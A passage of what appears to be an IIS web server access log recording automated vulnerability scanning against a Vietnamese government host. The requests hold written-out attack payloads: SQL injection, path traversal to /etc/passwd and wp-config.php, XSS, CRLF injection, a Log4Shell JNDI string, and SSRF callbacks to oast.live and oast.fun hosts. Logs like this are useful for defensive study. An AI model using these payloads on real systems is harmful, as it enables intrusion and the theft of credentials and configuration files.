Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 230 2024-12-12 17:14:07 103.153.214.94 GET /login.rst - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.2+Safari/605.1.15 - 404 7 0 230 2024-12-12 17:14:08 103.153.214.94 GET /login.rst - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 17:14:15 103.153.214.94 GET /ER8300G2-X.cfg - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 17:14:15 103.153.214.94 GET /config.json - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 - 404 7 0 230 2024-12-12 17:14:32 103.153.214.94 GET / p=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.24 - 404 7 0 203 2024-12-12 17:16:17 103.153.214.94 POST /index.cfm/_api/json/v1/default/ method=processAsyncObject 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 224 2024-12-12 17:16:54 103.153.214.94 GET /index.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+aarch64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 39 2024-12-12 17:17:02 103.153.214.94 GET /account/ user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(999999999),0x7c,%20%22Version:%22,version()),13--+- 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 17:17:08 103.153.214.94 GET /overview.asp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 59 2024-12-12 17:17:08 103.153.214.94 GET /include/thumb.php dir=http/.....///.....///config/config_db.php 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 57 2024-12-12 17:17:08 103.153.214.94 GET /include/thumb.php dir=.....///http/.....///config/config_db.php 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 39 2024-12-12 17:17:09 103.153.214.94 GET /include/thumb.php dir=http\\..\\..\\config\\config_db.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.1 - 404 7 0 30 2024-12-12 17:17:12 103.153.214.94 GET /SetupWizard.aspx/QlNQGPTXCX - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 17:18:04 103.153.214.94 POST /rest/V1/guest-carts/1/estimate-shipping-methods - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 205 2024-12-12 17:19:37 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.153183 - 404 7 0 36 2024-12-12 17:19:37 103.153.214.94 GET /bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php log_cnt=<img%20onerror=alert(document.domain)%20src=1> 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 17:19:46 103.153.214.94 GET /mifs/asfV3/api/v2/admins/users - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 17:20:19 103.153.214.94 GET /lab/api/settings/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 33 2024-12-12 17:20:29 103.153.214.94 GET /api/downloads fileName=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.17+(KHTML,+like+Gecko)+Version/17.3.75+Safari/616.17 - 404 7 0 58 2024-12-12 17:20:32 103.153.214.94 GET /idp/profile/oidc/authorize client_id=demo_rp&request_uri=https://ctcj3jjbclslbev4n7q031hwioeojgso8.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 56 2024-12-12 17:20:32 103.153.214.94 GET /mdiy/dict/listExcludeApp query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 31 2024-12-12 17:21:48 103.153.214.94 GET /welcome - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 17:23:02 103.153.214.94 POST /Admin/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 211 2024-12-12 17:23:05 103.153.214.94 GET /Admin/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 219 2024-12-12 17:23:37 103.153.214.94 POST /cgi-bin/cstecgi.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 https://bcvt.kontum.gov.vn:8172/page/index.html 404 7 0 204 2024-12-12 17:23:39 103.153.214.94 GET /Q1HpKM.txt - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 17:24:16 103.153.214.94 GET /mailinspector/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:89.0)+Gecko/20100101+Firefox/89.0 - 404 7 0 199 2024-12-12 17:24:26 103.153.214.94 GET /filemanager/ajax_calls.php action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 17:24:26 103.153.214.94 GET /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/98.0.4758.102+Safari/537.36 - 404 7 0 71 2024-12-12 17:24:27 103.153.214.94 GET /api/logout redirect_to=%0d%0aSet-Cookie:crlfinjection=1; 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.23 - 404 7 0 55 2024-12-12 17:24:27 103.153.214.94 GET /info/dir / 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 64 2024-12-12 17:24:29 103.153.214.94 GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/ FilePath=../Resource/JHFileConfig.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/616.8+(KHTML,+like+Gecko)+Version/17.2.12+Safari/616.8 - 404 7 0 55 2024-12-12 17:24:36 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 201 2024-12-12 17:24:42 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Mobile/15E148+Safari/604.1 - 404 7 0 33 2024-12-12 17:24:43 103.153.214.94 GET /scripts/logdownload.php dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 39 2024-12-12 17:24:45 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.2.22 - 404 7 0 37 2024-12-12 17:24:57 103.153.214.94 POST /webtools/control/forgotPassword/ProgramExport - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 219 2024-12-12 17:24:57 103.153.214.94 GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php file=../../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 32 2024-12-12 17:24:59 103.153.214.94 GET /api/config - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_16)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 62 2024-12-12 17:26:03 103.153.214.94 GET /index.php entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 226 2024-12-12 17:26:12 103.153.214.94 GET /ccm/system/panels/page/preview_as_user/preview cID="></iframe><svg/onload=alert("2q3kZ6sE1HauOmKvBEIjMwPna6d")> 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 17:26:15 103.153.214.94 GET /passport/index.php action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/92.0.4515.159+Safari/537.36 - 404 7 0 49 2024-12-12 17:26:29 103.153.214.94 GET /wp-admin/admin-ajax.php action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 35 2024-12-12 17:27:11 103.153.214.94 POST /include/file.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 232 2024-12-12 17:28:11 103.153.214.94 GET /global-protect/portal/images/2q6JQPzTQJ5Y0p7ENeTWjAnXhhO.txt - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 17:28:11 103.153.214.94 POST /api/gen/clients/csharp - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 197 2024-12-12 17:28:13 103.153.214.94 POST /ssl-vpn/hipreport.esp - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 219 2024-12-12 17:28:15 103.153.214.94 GET /global-protect/portal/images/2q6JQPzTQJ5Y0p7ENeTWjAnXhhO.txt - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 203 2024-12-12 17:29:36 103.153.214.94 GET /controlloLogin.js - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 17:29:37 103.153.214.94 POST /api/ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 209 2024-12-12 17:31:12 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 17:32:44 103.153.214.94 GET /index.php option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&sort=latest&page=index.php&format=xml&task=showproducts&view=med&sortdir=%27 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 34 2024-12-12 17:32:44 103.153.214.94 GET /jshERP-boot/user/getAllList;.ico - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:79.0)+Gecko/20100101+Firefox/79.0 - 404 7 0 35 2024-12-12 17:32:46 103.153.214.94 GET /user/scripts/login_par.js - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 56 2024-12-12 17:32:47 103.153.214.94 GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php abspath=%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 17:32:47 103.153.214.94 GET /v1/submissions - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 73 2024-12-12 17:32:49 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 404 7 0 31 2024-12-12 17:32:49 103.153.214.94 GET /config/databases.yml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 57 2024-12-12 17:33:08 103.153.214.94 GET /enginemanager/server/logs/download logType=error&logName=../../../../../../../../etc/passwd&logSource=engine 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 17:33:09 103.153.214.94 GET /adm/krgourl.php DOCUMENT_ROOT=http://ctcj3jjbclslbev4n7q0wkk1b91qqco9t.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.2.19 - 404 7 0 32 2024-12-12 17:33:09 103.153.214.94 GET /v1/folder path=%2F 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 39 2024-12-12 17:33:39 103.153.214.94 GET /OA_HTML/jtfwrepo.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 17:34:11 103.153.214.94 GET /install.html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 17:34:42 103.153.214.94 GET /nagiosxi/install.php - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 34 2024-12-12 17:34:45 103.153.214.94 GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 244 2024-12-12 17:34:52 103.153.214.94 GET /servlets/FetchFile fileName=../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 17:35:17 103.153.214.94 POST /secserver/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.21 - 404 7 0 221 2024-12-12 17:35:17 103.153.214.94 POST /api/pull - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 17:35:20 103.153.214.94 POST /api/push - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 17:35:20 103.153.214.94 POST /secserver/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.18 - 404 7 0 206 2024-12-12 17:37:00 103.153.214.94 POST /as/wapi/vmp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 225 2024-12-12 17:37:03 103.153.214.94 POST /as/wapi/vmp - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14092.77.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.107+Safari/537.36 - 404 7 0 225 2024-12-12 17:37:35 103.153.214.94 GET /api/webdav/chatgpt-next-web/backup.json endpoint=https://webdav.yandex.com.ctd67t3bclspkptm3qo0iosuccnsmfj7t.oast.fun/ 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 227 2024-12-12 17:38:01 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 196 2024-12-12 17:38:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 206 2024-12-12 17:38:19 103.153.214.94 GET /jolokia/list - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 52 2024-12-12 17:38:22 103.153.214.94 GET /index/install - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 17:38:22 103.153.214.94 GET /appmonitor/protected/selector/server_file/files folder=C://&suffix 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:99.0)+Gecko/20100101+Firefox/99.0 - 404 7 0 32 2024-12-12 17:38:23 103.153.214.94 GET /actuator/jolokia/list - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.4)+AppleWebKit/616.33+(KHTML,+like+Gecko)+Version/17.6+Safari/616.33 - 404 7 0 54 2024-12-12 17:38:25 103.153.214.94 GET /index.php/index/install - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 38 2024-12-12 17:38:26 103.153.214.94 GET /appmonitor/protected/selector/server_file/files folder=/&suffix 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 66 2024-12-12 17:38:28 103.153.214.94 GET /sysaid/getGfiUpgradeFile fileName=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 46 2024-12-12 17:38:28 103.153.214.94 PUT /mdm/checkin - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 - 404 7 0 200 2024-12-12 17:38:31 103.153.214.94 GET /getGfiUpgradeFile fileName=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 37 2024-12-12 17:38:41 103.153.214.94 GET /en-US/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 202 2024-12-12 17:38:55 103.153.214.94 GET /.msmtprc - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 34 2024-12-12 17:39:19 103.153.214.94 GET /interview i=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 40 2024-12-12 17:39:58 103.153.214.94 POST /webtools/control/main/ProgramExport - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 229 2024-12-12 17:40:51 103.153.214.94 POST /api/v1/livechat/sms-incoming/twilio - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13.0)+AppleWebKit/617.28+(KHTML,+like+Gecko)+Version/17.0+Safari/617.28 - 404 7 0 209 2024-12-12 17:41:20 103.153.214.94 POST /ajax-api/2.0/mlflow/experiments/create - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 204 2024-12-12 17:41:29 103.153.214.94 GET /realms/master/protocol/openid-connect/auth client_id=security-admin-console&redirect_uri=https%3A%2F%2fbcvt.kontum.gov.vn:8172%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 199 2024-12-12 17:43:49 103.153.214.94 GET /auth/setup - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 17:43:49 103.153.214.94 GET /install.php a=check 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 17:43:49 103.153.214.94 GET /searchblox/servlet/FileServlet col=9&url=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 17:43:49 103.153.214.94 GET /api/geojson url=${jndi:ldap://${:-207}${:-295}.${hostName}.url.ctcj3jjbclslbev4n7q0gsoso8niqbmhj.oast.live} 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 31 2024-12-12 17:43:49 103.153.214.94 GET /download.php file=../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 40 2024-12-12 17:43:49 103.153.214.94 GET /admin/ajax/avatar.php id=-1+union+select+md5(999999999)%23 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 30 2024-12-12 17:43:49 103.153.214.94 GET /include/dialog/config.php adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 17:43:49 103.153.214.94 GET /api/settings/values - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 17:43:49 103.153.214.94 GET /password.jsn - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 35 2024-12-12 17:43:49 103.153.214.94 GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.png.js - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 400 0 0 33 2024-12-12 17:43:51 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 0 0 56 2024-12-12 17:44:48 103.153.214.94 GET /image/image:/..%2fetc%2fpasswd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 400 0 0 42 2024-12-12 17:44:54 103.153.214.94 GET /download/index.php file=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 